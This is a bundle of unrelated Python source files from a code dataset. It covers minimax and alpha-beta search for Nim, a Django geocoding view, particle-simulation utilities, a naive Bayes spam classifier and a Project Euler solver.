maximo_valor\n\n## ==================================================================\n## Ejercicio 1\n## ==================================================================\n\n## Definir en python una clase Juego que represente un problema de\n## búsqueda con adversario. La clase debe tener los siguientes\n## atributos:\n\n## - estado_inicial: Estado inicial del juego.\n## - estado_final: Estado final del juego (si es único).\n## - maximo_valor: Cota superior de los valores de la función de\n## evaluación estática\n## - minimo_valor: Cota inferior de los valores de la función de\n## evaluación estática\n\n## y los siguientes métodos:\n\n## - movimientos(estado): Lista de movimientos aplicables al 'estado'.\n## - aplica(movimiento,estado): Estado resultado de aplicar el\n## 'movimiento' al 'estado'.\n## - es_estado_final(estado): Comprueba si el 'estado' es un estado\n## final del juego. Por defecto compara con el estado final.\n## - es_estado_ganador(estado,turno,jugador): Comprueba si el\n## 'jugador' gana el juego en el 'estado' cuando le toca al jugador\n## 'turno'.\n## - f_evaluacion(estado,turno): Devuelve el valor asociado al\n## 'estado' cuando le toca jugar al jugador 'turno'. Por defecto\n## está definida como la función de utilidad para los estados\n## finales y 0 en caso cualquier otro caso.\n## - str_estado(estado): Devuelve una repesentación en forma de cadena\n## de texto del 'estado'.\n## - str_movimiento(movimiento): Devuelve una repesentación en forma\n## de cadena de texto del 'movimiento'.\n\n## El constructor de la clase recibe el estado inicial, el estado\n## final, en caso de que éste sea único y los valores máximo y mínimo\n## de la función de evaluación (por defecto, infinito y -infinito\n## respectivamente).\n\n\nclass juego:\n\n def __init__(self, estado_inicial, estado_final=None,\n maximo_valor=float(\"inf\"), minimo_valor=-float(\"inf\")):\n\n self.estado_inicial = estado_inicial\n self.estado_final = estado_final\n self.maximo_valor = maximo_valor\n self.minimo_valor = minimo_valor\n\n def es_estado_final(self, estado):\n return estado==self.estado_final\n\n def movimiento(self, estado):\n pass\n\n def aplica(self, mov, estado):\n pass\n \n def es_estado_ganador(self, estado, turno, jugador):\n pass\n \n def f_evaluacion(self, estado, turno):\n\n if self.es_estado_ganador(estado, turno, \"MAX\"):\n return self.maximo_valor\n elif self.es_estado_ganador(estado, turno, \"MIN\"):\n return self.minimo_valor\n else:\n return 0\n\n def str_estado(self, estado):\n return str(estado)\n\n \n def str_movimiento(self, mov):\n return str(mov)\n\n\n## ==================================================================\n## NIM\n## ==================================================================\n\n## Recordemos el juego del Nim visto en clase. Inicialmente se dispone\n## de una pila de N fichas. En cada jugada, el jugador tiene que\n## elegir 1, 2 ó 3 fichas. El jugador que coja la última pieza pierde.\n \n## ==================================================================\n## Ejercicio 2\n## ==================================================================\n\n## Definir una función nim(n), que recibiendo como entrada un número\n## natural n, devuelva la instancia de la clase Juego correspondiente\n## al juego del Nim que inicia la partida con n piezas sobre la mesa.\n\n## Utilizar como función de evaluación estática la siguiente: Si el\n## resto de dividir entre 4 el número de piezas del estado es igual a\n## 1 entonces, si es el turno de 'MAX' devolver -1 y si es el turno de\n## 'MIN', devolver 1. Si el resto de dividir entre 4 el número de\n## piezas del estado es distinto de 1 entonces, si es el turno de\n## 'MAX' devolver 1 y si es el turno de 'MIN', devolver -1.\n\n## >>> juego_nim = nim(17)\n## >>> juego_nim.estado_inicial\n## 17\n## >>> juego_nim.es_estado_final(3)\n## False\n## >>> juego_nim.movimientos(2)\n## [2, 1]\n## >>> juego_nim.movimientos(17)\n## [3, 2, 1]\n## >>> juego_nim.aplica(17, 3)\n## 14\n\n#def nim(n):\n# estado_inicial = n\n\nclass Nim(juego): #juego es la calse padre\n\n def __init__(self, n):\n super().__init__(n, 0, 1, -1)\n self.movimientos_posibles = [1,2,3] \n\n def es_estado_ganador(self, estado, turno, jugador):\n return turno == jugador\n\n def movimientos(self, estado):\n return [m for m in self.movimientos_posibles if m<=estado] # [m | m<-[movimientos_posibles],m<=estado] asi en haskell\n\n def aplica(self, mov, estado):\n return estado-mov\n\n def str_movimiento(self, mov):\n return \"Quitar {}\".format(mov)\n\n def f_evaluacion(self, estado, turno): #siempre desde el punto de vista de MAX\n if estado%4 == 1:\n if turno == \"MAX\":\n return self.minimo_valor\n else:\n return self.maximo_valor\n else:\n if turno == \"MAX\":\n return self.maximo_valor\n else:\n return self.minimo_valor\n \n \ndef nim(n):\n return Nim(n)\n\n\n\n## ===================================================================\n## Algoritmo de decision minimax\n## ===================================================================\n\n## En esta parte vamos a implementar el algoritmo de toma de\n## decisiones minimax.\n\n## ==================================================================\n## Ejercicio 3\n## ==================================================================\n\n## Implementar el procedimiento de decisión minimax visto en\n## clase. Para ello definir las siguientes funciones:\n\n## - minimax: Dado un juego, un estado del juego y un valor de\n## profundidad, devuelve el movimiento (aplicable a dicho estado en\n## el que tiene que jugar 'MAX', con mejor valor minimax de entre\n## todas las opciones disponibles) y el estado que resulta al\n## aplicar dicho movimiento.\n\n## - valor_minimax: Dado un juego, un estado del juego, el jugador que\n## tiene el turno y un valor de profundidad, devuelve el valor\n## minimax obtenido como el valor de la función de evaluación\n## estática si se ha alcanzado la cota de profundidad, el estado es\n## final o no hay movimientos aplicables al estado; o el mejor de\n## los valores minimax de los estados sucesores (el máximo si juega\n## 'MAX' o el mínimo si juega 'MIN').\n\n## - maximizador: Dado un juego, un estado, una lista de movimientos\n## aplicables a dicho estado (sucesores) y un valor de profundidad,\n## devuelve el máximo de los valores minimax de los estados\n## obtenidos aplicando cada uno de los movimientos al estado\n## proporcionado.\n\n## - minimizador: Dado un juego, un estado, una lista de movimientos\n## aplicables a dicho estado (sucesores) y un valor de profundidad,\n## devuelve el mínimo de los valores minimax de los estados\n## obtenidos aplicando cada uno de los movimientos al estado\n## proporcionado.\n\n## ##################################################################\n\n## >>> from juego import *\n## >>> control(juego_nim, 'MAX', [minimax, 5])\n## Estado : 17\n## Jugador : MAX\n## Mi turno.\n## Estado : 16\n## Jugador : MIN\n## Los movimientos permitidos son:\n## Quitar 3 (0)\n## Quitar 2 (1)\n## Quitar 1 (2)\n## Tu turno: 0\n## Estado : 13\n## Jugador : MAX\n## Mi turno.\n## Estado : 12\n## Jugador : MIN\n## Los movimientos permitidos son:\n## Quitar 3 (0)\n## Quitar 2 (1)\n## Quitar 1 (2)\n## Tu turno: 0\n## Estado : 9\n## Jugador : MAX\n## Mi turno.\n## Estado : 8\n## Jugador : MIN\n## Los movimientos permitidos son:\n## Quitar 3 (0)\n## Quitar 2 (1)\n## Quitar 1 (2)\n## Tu turno: 0\n## Estado : 5\n## Jugador : MAX\n## Mi turno.\n## Estado : 4\n## Jugador : MIN\n## Los movimientos permitidos son:\n## Quitar 3 (0)\n## Quitar 2 (1)\n## Quitar 1 (2)\n## Tu turno: 0\n## Estado : 1\n## Jugador : MAX\n## Mi turno.\n## Estado : 0\n## Jugador : MIN\n## El humano ha ganado\n\ndef minimax(juego, estado, cota):\n max_val = -float(\"inf\")\n movimiento_elegido = None\n nuevo_estado = None\n\n for m in juego.movimientos(estado):\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_minimax(juego, sucesor, \"MIN\", cota-1)\n if max_val < valor_sucesor:\n max_val = valor_sucesor\n movimiento_elegido = m\n nuevo_estado = sucesor\n return (movimiento_elegido,nuevo_estado)\n\n\ndef valor_minimax(juego, estado, turno, cota):\n if(cota==0 or juego.es_estado_final(estado)):\n return juego.f_evaluacion(estado, turno)\n else:\n movs = juego.movimientos(estado)\n if turno == \"MAX\":\n return maximizador(juego, estado, movs, cota-1)\n else:\n return minimizador(juego, estado, movs, cota-1)\n\n\ndef maximizador(juego, estado, movs, cota):\n max_val = -float(\"inf\")\n for m in movs:\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_minimax(juego, sucesor, \"MIN\", cota)\n if max_val < valor_sucesor:\n max_val = valor_sucesor\n return max_val\n\ndef minimizador(juego, estado, movs, cota):\n min_val = float(\"inf\")\n for m in movs:\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_minimax(juego, sucesor, \"MAX\", cota)\n if min_val > valor_sucesor:\n min_val = valor_sucesor\n return min_val\n\n\n \n## ------------------------------------------------------------------\n## Ejercicio 4\n## ------------------------------------------------------------------\n\n## Implementar el algoritmo de toma de decisiones minimax con poda\n## alfabeta.\n\n## - alfa_beta: Dado un juego, un estado del juego y una cota de\n## profundidad, devuelve el movimiento (y el estado que resulta al\n## aplicarlo) del juego aplicable a dicho estado con el que tiene que\n## jugar 'MAX'. El movimiento con mejor valor minimax de entre todas\n## las opciones disponibles.\n\ndef alfa_beta(juego, estado, cota):\n alfa = -float(\"inf\")\n beta = juego.maximo_valor\n movimiento_elegido = None\n nuevo_estado = None\n\n for m in juego.movimientos(estado):\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_alfabeta(juego, sucesor, \"MIN\", cota-1, alfa, beta)\n if alfa < valor_sucesor:\n alfa = valor_sucesor\n movimiento_elegido = m\n nuevo_estado = sucesor\n if alfa >= beta:\n break\n return (movimiento_elegido,nuevo_estado)\n\ndef valor_alfabeta(juego, estado, turno, cota, alfa, beta):\n if(cota==0 or juego.es_estado_final(estado)):\n return juego.f_evaluacion(estado, turno)\n else:\n movs = juego.movimientos(estado)\n if turno == \"MAX\":\n return maximizador_alfabeta(juego, estado, movs, cota-1, alfa, beta)\n else:\n return minimizador_alfabeta(juego, estado, movs, cota-1, alfa, beta)\n\ndef maximizador_alfabeta(juego, estado, movs, cota, alfa, beta):\n for m in movs:\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_alfabeta(juego, sucesor, \"MIN\", cota, alfa, beta)\n if alfa < valor_sucesor:\n alfa = valor_sucesor\n if alfa >= beta:\n break\n return alfa\n\ndef minimizador_alfabeta(juego, estado, movs, cota, alfa, beta):\n for m in movs:\n sucesor = juego.aplica(m,estado)\n valor_sucesor = valor_alfabeta(juego, sucesor, \"MAX\", cota, alfa, beta)\n if beta > valor_sucesor:\n beta = valor_sucesor\n if alfa >= beta:\n break\n return beta","sub_path":"practica-02.py","file_name":"practica-02.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2236759","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nimport pandas as pd\nimport requests\nimport json, os\nimport csv\n\n\n\n\ndef upload_excel(request):\n \"\"\"\n Returns a excel file with co-ordinates \n provided by user in a csv file.\n \"\"\"\n if request.method == 'GET':\n return render(request, 'locationapi/upload_excel.html')\n else:\n # File recieved and processed using pandas dataframe\n try:\n excel_file = request.FILES[\"excel_file\"]\n excel_data = pd.read_csv(excel_file)\n for val in excel_data['address']:\n url = f\"http://www.mapquestapi.com/geocoding/v1/address?key={'9BQLAZrmm65boiXlfL0IDHmZWyW1aAKh'}&location={val}\"\n output = requests.get(url)\n json_output = output.json()\n loc = json_output['results'][0]['providedLocation']['location']\n lat = json_output['results'][0]['locations'][0]['latLng']['lat']\n lng = json_output['results'][0]['locations'][0]['latLng']['lng'] \n excel_data.loc[excel_data.address == loc, ['latitude', 'longitude']] = lat, lng\n\n # Reponse file sent to user\n response = HttpResponse(content_type='application/vnd.ms-excel')\n response['Content-Disposition'] = 'attachment; filename=output.csv'\n writer = csv.writer(response)\n writer.writerow(['no', 'address', 'latitude', 'longitude'])\n\n for row in excel_data.itertuples():\n writer.writerow(list(row))\n return response\n\n except Exception as e:\n return HttpResponse(\"Please check the file uploaded, instructions/rules are provided on upload page.\")\n","sub_path":"locationapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"455586306","text":"from django import template\n\nregister = template.Library()\n\n@register.inclusion_tag('manage/partials/_module_list_tag_template.html', takes_context=True)\ndef list_my_modules(context):\n '''\n displays the modules created by the current user\n\n :param context: the context of the current page\n :return: templated listing of all modules created by the user specified in view context\n '''\n my_modules = context['user'].created_modules.all().order_by('-updated_at')\n return {\n 'my_modules': my_modules,\n }\n\n# not sure how to handle this yet...\n#@register.inclusion_tag('manage/forms/module_form.html')\n# def display_module_form(module):\n# module_form = module\n# return {\n# module_form:\n# }","sub_path":"src/apps/manage/templatetags/manage_template_tags.py","file_name":"manage_template_tags.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535503621","text":"import numpy as np\nimport sys\nsys.path.insert(0, \"./bounce-viz/src/\")\nfrom simple_polygon import Simple_Polygon\nfrom random import uniform\nfrom helper.shoot_ray_helper import IsInPoly, ClosestPtAlongRay\n\nEPSILON = 0.000000001\n\n# Geometric Operations\n# --------------------\n\n# http://mathworld.wolfram.com/Point-LineDistance2-Dimensional.html\ndef closest_edge(pt, poly):\n [x0,y0] = pt\n vs = poly.vertex_list_per_poly\n n = poly.size\n components = len(vs)\n min_d = 100000000000\n closest_component = -1\n closest_edge = -1\n # find closest edge over external boundary and holes\n for (i, component) in enumerate(vs):\n m = len(component)\n for j in range(m):\n [x1, y1], [x2,y2] = component[j][1], component[(j+1) % m][1]\n d = abs((x2-x1)*(y1-y0) - (x1-x0)*(y2-y1)) / np.sqrt((x2-x1)**2 + (y2-y1)**2)\n if d < min_d:\n min_d = d\n closest_component = i\n closest_edge = j\n return min_d, closest_component, closest_edge\n\ndef dist_dir_closest_edge(pt, poly):\n d, c, j = closest_edge(pt, poly)\n vs = poly.vertex_list_per_poly\n csize = len(vs[c])\n edge_vect = vs[c][(j + 1) % csize][1] - vs[c][j][1]\n return d, edge_vect\n\ndef normalize(vector):\n norm = np.linalg.norm(vector)\n if norm > EPSILON:\n return vector/norm\n else:\n return 0.0*vector\n\ndef rotate_vector(v, theta):\n vx, vy = v[0], v[1]\n return np.array( [np.cos(theta)*vx - np.sin(theta)*vy,\n np.sin(theta)*vx + np.cos(theta)*vy])\n\ndef midpoint(pt1, pt2):\n return (pt1+pt2)/2\n\n\n# Collision Utilities\n# -------------------\n\n\n# elastic scattering\ndef twoCollide(particle1, particle2):\n v1, v2 = particle1.velocity, particle2.velocity\n v1x, v1y = v1\n v2x, v2y = v2\n m1, m2 = particle1.mass, particle2.mass\n p1, p2 = particle1.position, particle2.position\n x1x, x1y = p1\n x2x, x2y = p2\n v1prime = v1 - (2 * m2) / (m1 + m2) * (np.dot(v1-v2,p1-p2)) / ((x1x - x2x)**2 + (x1y - x2y)**2) * (p1 - p2)\n v2prime = v2 - (2 * m1) / (m1 + m2) * (np.dot(v2-v1,p2-p1)) / ((x2x - x1x)**2 + (x2y - x1y)**2) * (p2 - p1)\n particle1.velocity = v1prime\n particle2.velocity = v2prime\n\ndef softRepulse(particle1, particle2, K):\n v1, v2 = particle1.velocity, particle2.velocity\n v1x, v1y = v1\n v2x, v2y = v2\n m1, m2 = particle1.mass, particle2.mass\n p1, p2 = np.array(particle1.position), np.array(particle2.position)\n r1, r2 = particle1.radius, particle2.radius\n # vector from p1 to p2\n r12 = normalize(p2-p1)\n # vector from p2 to p1\n r21 = normalize(p1-p2)\n\n # magnitude of repulsive force proportional to distance\n rlen = np.linalg.norm(p1-p2)\n if rlen < r1+r2:\n f = K*(r1 + r2 - rlen)\n else:\n f = 0\n\n # force on particle 1\n # TODO: fix to incorporate direction of heading\n f1 = f*r21\n # force on particle 2\n f2 = f*r12\n\n particle1.velocity += f1/m1\n particle2.velocity += f2/m2\n\n\n# Environment Utilities\n# -----------------\n\ndef mk_spiky_circle(n, r):\n d = 2*np.pi/n\n theta = 0\n pts = []\n for i in range(n):\n pt1 = [r*np.cos(theta), r*np.sin(theta)]\n r2 = 1.5*r\n pt2 = [r2*np.cos(theta), r2*np.sin(theta)]\n theta += d\n pts.extend([pt1, pt2])\n return pts\n\ndef mk_spiky_obstacle(n, r):\n d = 2*np.pi/n\n theta = 0.0\n pts = []\n for i in range(n):\n pt1 = [r*np.cos(theta), r*np.sin(theta)]\n r2 = 0.6*r\n th2 = theta + 0.3*d\n pt2 = [r2*np.cos(th2), r2*np.sin(th2)]\n theta += d\n pts.extend([pt1, pt2])\n return pts[::-1]\n\ndef mk_regpoly(n, r, offset=0.0):\n d = 2*np.pi/n\n theta = offset\n pts = []\n for i in range(n):\n pt = [r*np.cos(theta), r*np.sin(theta)]\n theta += d\n pts.append(pt)\n return pts\n\ndef mk_obstacle(vertices):\n return vertices[::-1]\n\ndef mk_bounding_box(poly):\n vs = poly.vertex_list_per_poly[0]\n xs = np.sort([v[0] for i, v in vs])\n ys = np.sort([v[1] for i, v in vs])\n min_x = xs[0]\n max_x = xs[-1]\n min_y = ys[0]\n max_y = ys[-1]\n bb_verts = np.array([(min_x, min_y), (max_x, min_y), (max_x, max_y), (min_x, max_y)])\n bb = Simple_Polygon(\"bb\"+poly.name, bb_verts)\n return min_x, max_x, min_y, max_y, bb\n\ndef uniform_sample_from_poly(poly, n):\n min_x, max_x, min_y, max_y, bb = mk_bounding_box(poly)\n samples = [[0,0]]*n\n for i in range(n):\n sample = [uniform(min_x, max_x), uniform(min_y, max_y)]\n while not IsInPoly(sample, poly):\n sample = uniform(min_x, max_x), uniform(min_y, max_y)\n samples[i] = sample\n return samples\n\ndef uniform_sample_along_circle(poly, n, r):\n samples = [[0,0]]*n\n for i in range(n):\n sample = r*normalize([uniform(-1., 1.), uniform(-1.,1.)])\n while not IsInPoly(sample, poly):\n sample = r*normalize([uniform(-1., 1.), uniform(-1.,1.)])\n samples[i] = sample\n return samples\n\n\n\n# Magnetic flow field generation\n# all the ugly packing/unpacking is to make matplotlib stuff work\n# ------------------------------\n\nclass Wire():\n def __init__(self, xy, dir):\n self.xy = xy\n self.dir = dir\n\n def force_at(self, x, y):\n xself, yself = self.xy\n normal = np.array([x-xself, y-yself])\n # current flowing through wire creates mag field that drops off as 1/r\n field_strength = np.true_divide(1.0, np.linalg.norm(normal, axis=0))\n field = []\n if self.dir == \"CW\":\n field = field_strength*normalize(rotate_vector(normal, 3.*np.pi/2.))\n elif self.dir == \"CCW\":\n field = field_strength*normalize(rotate_vector(normal, np.pi/2.))\n else:\n field = np.array([0.*x, 0.*y])\n return field[0], field[1]\n\n# magnetic fields follow superposition principle\ndef force_from_wires(wires, xy):\n x, y = xy\n force = np.array([0.0, 0.0])\n for w in wires:\n fx, fy = w.force_at(x, y)\n force += np.array([fx, fy])\n return force\n\n# running policies\n# ----------------\n\n# hardcoded: four wires, each wire is either CW, CCW, or X\n# let wires be arranged as:\n # 0 1\n # 2 3\n# let CW := 0\n# CCW := 1\n# X := 2\n#\n# encode with base-3 number system\n\nwire_to_state = {\"CW\":0, \"CCW\":1, \"X\":2}\nstate_to_wire = {0:\"CW\", 1:\"CCW\", 2:\"X\"}\n\ndef encode_policy(wires):\n [w0, w1, w2, w3] = wires # TODO use pycontracts\n policy = 0\n for i,w in enumerate(wires):\n policy += wire_to_state[w]*(3**i)\n return policy\n\ndef decode_policy(policy):\n states = [\"\", \"\", \"\", \"\"]\n for i in range(4):\n mod_policy = policy % 3\n states[i] = mod_policy\n policy = policy // 3\n str_states = [state_to_wire[s] for s in states]\n return str_states\n\ndef encodeJointState(states):\n X = 5 # five options for state\n joint_state = 0\n N = len(states)-1\n for s in states:\n joint_state += s*(X**N)\n N = N - 1\n return joint_state\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"379629255","text":"import os\nimport re\nfrom setuptools import setup, find_packages\n\n\ndef get_file(*parts):\n filename = os.path.join(os.path.dirname(__file__), *parts)\n return open(filename)\n\n\ndef find_version(*file_paths):\n f = get_file(*file_paths)\n for line in f:\n if re.match('__version__ = .+', line):\n return re.search('\\d.+\\d', line).group(0)\n raise RuntimeError('Unable to find string version')\n\n\nREADME = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='teracy-html5boilerplate',\n version=find_version('teracy', 'html5boilerplate', '__init__.py'),\n packages=find_packages(),\n namespace_packages=['teracy'],\n include_package_data=True,\n license='BSD License',\n description='html5-boilerplate Django wrapper application',\n long_description=README,\n url='http://www.teracy.org/projects/teracy-html5boilerplate',\n author='hoatle',\n author_email='hoatlevan@gmail.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: html5-boilerplate',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644611075","text":"import random\n\nimport numpy as np\nimport re\n\n\ndef load_dataset():\n \"\"\"\n 创建了一些实验样本\n 第一个变量返回切分集,第二个返回是否具有侮辱性\n \"\"\"\n\n posting_list = [\n ['my','dog','has','flea',\n 'problems','help','please'],\n ['maybe','not','take','him',\n 'to','dog','park','stupid'],\n ['my','dalmation','is','so','cute',\n 'I','love','him'],\n ['stop','posting','stupid','worthless','garbage'],\n ['mr','licks','ate','my','steak','how',\n 'to','stop','him'],\n ['quit','buying','worthless','dog','food','stupid']\n ]\n class_vec = [0,1,0,1,0,1] # 1是侮辱,0正常\n return posting_list,class_vec\n\ndef create_vocab_list(dataset):\n # 创建一个空集,用来存所有的单词\n vocab_set = set([])\n for document in dataset:\n # 求两个集合的并集,或操作符\n vocab_set = vocab_set | set(document)\n return list(vocab_set)\n\ndef set_of_words2vec(vocab_list,input_set):\n \"\"\"词集模型,词出现多少次都只记为1\"\"\"\n # 初始化一个长度为词汇表的0向量\n return_vec = [0]*len(vocab_list)\n # 对于输入集合中的某个词\n for word in input_set:\n # 如果这个词存在于词汇表中\n if word in vocab_list:\n # 计数器设为1\n return_vec[vocab_list.index(word)] = 1\n else:\n print('the word: %s is not in my vocabulary!' % word)\n return return_vec\n\ndef bag_of_words2vec(vocab_list,input_set):\n \"\"\"朴素贝叶斯词袋模型\"\"\"\n return_vec = [0]*len(vocab_list)\n for word in input_set:\n if word in vocab_list:\n # 这里是加1\n return_vec[vocab_list.index(word)] += 1\n return return_vec\n\ndef train_nb0(train_matrix,train_category):\n \"\"\"p1是侮辱性文档,,一旦某个词语侮辱或正常的,则对应的p1_num或p0_num就加1,再所有的文档中,该文档的总词语+1\"\"\"\n num_train_docs = len(train_matrix)\n num_words = len(train_matrix[0])\n p_abusive = np.sum(train_category)/float(num_train_docs)\n # p0_num = np.zeros(num_words)\n # p1_num = np.zeros(num_words)\n # # 分母的意思\n # p0_denom = 0.\n # p1_denom = 0.\n # 上面的初始化版本可能导致几个概率相乘为0,详见65页,改为:\n p0_num = np.ones(num_words)\n p1_num = np.ones(num_words)\n p0_denom = 2.\n p1_denom = 2.\n for i in range(num_train_docs):\n # 如果文章是侮辱性的\n if train_category[i] == 1:\n # 向量的相加,即是侮辱性的,那么反正出现的词都叠加起来\n p1_num += train_matrix[i]\n p1_denom += np.sum(train_matrix[i])\n else:\n p0_num += train_matrix[i]\n p0_denom += np.sum(train_matrix[i])\n # p1_vect = p1_num/p1_denom # change to log(),因为很多很小的数相乘会导致下溢,而log没这个问题\n # p0_vect = p0_num/p0_denom # change to log()\n p1_vect = np.log(p1_num / p1_denom)\n p0_vect = np.log(p0_num / p0_denom)\n # 返回这前两个向量的和都是1\n return p0_vect,p1_vect,p_abusive\n\ndef classify_nb(vec2classify,p0vec,p1vec,pclass1):\n # 输入:要分类的向量,用train_nb0计算得到的三个概率\n p1 = np.sum(vec2classify*p1vec) + np.log(pclass1)\n p0 = np.sum(vec2classify*p0vec) + np.log(1.0 - pclass1)\n # 返回分类结果\n if p1 > p0:\n return 1\n else:\n return 0\n\ndef testing_nb():\n # 获得数据\n list_of_posts,list_classes = load_dataset()\n # 提取出所有词库的唯一\n my_vocab_list = create_vocab_list(list_of_posts)\n # 用词向量来填充train_mat列表\n train_mat = []\n # 把那些句子都变成向量,塞进mat中\n for post_in_doc in list_of_posts:\n train_mat.append(set_of_words2vec(my_vocab_list,post_in_doc))\n # 对已经变成向量的句子,通过类标签来判别\n p0v,p1v,pab = train_nb0(np.array(train_mat),np.array(list_classes))\n # 进行测试\n test_entry = ['love','my','dalmation']\n this_doc = np.array(set_of_words2vec(my_vocab_list,test_entry))\n print(test_entry,'classified as: ',classify_nb(this_doc,p0v,p1v,pab))\n test_entry = ['stupid','garbage']\n this_doc = np.array(set_of_words2vec(my_vocab_list, test_entry))\n print(test_entry, 'classified as: ', classify_nb(this_doc, p0v, p1v, pab))\n\ndef split_text_test():\n my_sent = 'This book is the find_best book on Python or M.L. I have ever laid eyes upon.'\n # 简单分割,有很多标点\n print(my_sent.split())\n # 我感觉是多打了一个\\,就是用非字母来切分数据\n rtext = re.compile('\\\\W*')\n list_of_tokens = rtext.split(my_sent)\n print(list_of_tokens)\n t = [tok.lower() for tok in list_of_tokens if len(tok) > 0]\n email_text = open('email/ham/6.txt').read()\n list_of_tokens = rtext.split(email_text)\n print(list_of_tokens)\n\ndef text_parse(big_string):\n # 解析为字符串列表,去掉少于两个字符的字符串,并转为小写\n # 你想添加更多解析,就在这里搞\n list_of_tokens = re.split(r'\\W*',big_string)\n return [tok.lower() for tok in list_of_tokens if len(tok) > 2]\n\ndef spam_test():\n doc_list = []\n class_list = []\n full_text = []\n # 26会出错\n for i in range(1,23):\n # 读出所有的内容,调用parse打成词汇列表\n word_list = text_parse(open('email/spam/%d.txt' % i ).read())\n # 词汇列表放到doc里面\n doc_list.append(word_list) # 列表中放了一个列表\n full_text.extend(word_list) # 就是只有一个列表\n class_list.append(1) # 这些是spam邮件\n # 同上\n word_list = text_parse(open('email/ham/%d.txt' % i).read())\n doc_list.append(word_list)\n full_text.extend(word_list)\n class_list.append(0) # 这些是ham邮件\n # 提取出每个词的一份\n vocab_list = create_vocab_list(doc_list)\n # training_set = list(range(50))写40会出错\n # 一个0到39的列表\n training_set = list(range(40))\n # 测试集\n test_set = []\n for i in range(10):\n # 随机构造一些测试集和训练集\n # 剩余部分还有交叉验证\n # 好弱,这么随便的随机\n rand_index = int(random.uniform(0,len(training_set)))\n # test取这些样本\n test_set.append((training_set[rand_index]))\n # 在训练集中干掉\n del(training_set[rand_index])\n train_mat = []\n train_classes = []\n for doc_index in training_set:\n # 变成1010那种,每一个doc慢慢练求10,求完了放进train中\n train_mat.append((set_of_words2vec(vocab_list,doc_list[doc_index])))\n # 记住对应的类\n train_classes.append((class_list[doc_index]))\n # 得到各种概率\n p0v,p1v,pspam = train_nb0(np.array(train_mat),np.array(train_classes))\n error_count = 0\n for doc_index in test_set:\n word_vec = set_of_words2vec(vocab_list,doc_list[doc_index])\n # 测试分类结果,错了+1\n # 上面那些概率就是来计算这个的\n if classify_nb(np.array(word_vec),p0v,p1v,pspam ) != class_list[doc_index]:\n error_count += 1\n print('the error rate is: ',float(error_count)/len(test_set))\n\nif __name__ == '__main__':\n # list_classes是文章的侮辱与否标签\n # list_of_posts是简单的一些句拆分的词组\n # list_of_posts,list_classes = load_dataset()\n # # 提取出所有词库的唯一\n # my_vocab_list = create_vocab_list(list_of_posts)\n # print(my_vocab_list)\n # # 让一个句子拆分形成1 0 1 0 向量\n # a = set_of_words2vec(my_vocab_list,list_of_posts[0])\n # # 用词向量来填充train_mat列表\n # train_mat = []\n # # 把那些句子都变成向量,塞进mat中\n # for post_in_doc in list_of_posts:\n # train_mat.append((set_of_words2vec(my_vocab_list,post_in_doc)))\n # # 对已经变成向量的句子,通过类标签来判别\n # p0v,p1v,pab = train_nb0(train_mat,list_classes)\n # print(p0v)\n # # 这里会有一个0.15789474左右的概率,正好对应stupid的下标,说明这个词是侮辱的概率很大\n # print(p1v)\n # print(pab)\n # ['love', 'my', 'dalmation'] classified as: 0\n # ['stupid', 'garbage'] classified as: 1\n # testing_nb()\n # split_text_test()\n spam_test()","sub_path":"naive_bayes/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"162165712","text":"'''\r\nProject Euler 206\r\n'''\r\n\r\nimport itertools, time\r\ns = time.time()\r\n\r\ndef check(n):\r\n s = str(n ** 2)\r\n try:\r\n if all(s[2*i-1] == str(i) for i in range(1,11)):\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n\r\ndef string_check(n,code):\r\n s = str(n ** 2)[-len(code):]\r\n for index, value in enumerate(code):\r\n if value != '_' and value != s[index]:\r\n return False\r\n else:\r\n continue\r\n return True\r\n\r\n\r\n# NOT END WITH 30, 70! Should check both\r\n\r\nposs_list = []\r\nfor p in itertools.product('0123456789', repeat=2):\r\n s = int(p[0]+p[1]+'70')\r\n if string_check(s,'8_9_0'):\r\n poss_list.append(p)\r\n\r\n\r\nnext_poss_list = []\r\nfor p in itertools.product('0123456789', repeat=3):\r\n for q in poss_list:\r\n s = int(p[0]+p[1]+p[2]+q[0]+q[1]+'70')\r\n if string_check(s,'7_8_9_0'):\r\n next_poss_list.append((p,q))\r\n\r\nprint(time.time() -s)\r\n\r\nr = 0\r\nfor p in itertools.product('0123456789', repeat=2):\r\n for q in next_poss_list:\r\n s = int('1'+p[0]+p[1]+q[0][0]+q[0][1]+q[0][2]+q[1][0]+q[1][1]+'70')\r\n if string_check(s,'1_2_3_4_5_6_7_8_9_0'):\r\n print(s)\r\n r = 1\r\n break \r\n if r != 0:\r\n break\r\n\r\nprint(time.time() -s)\r\n\r\n\r\n 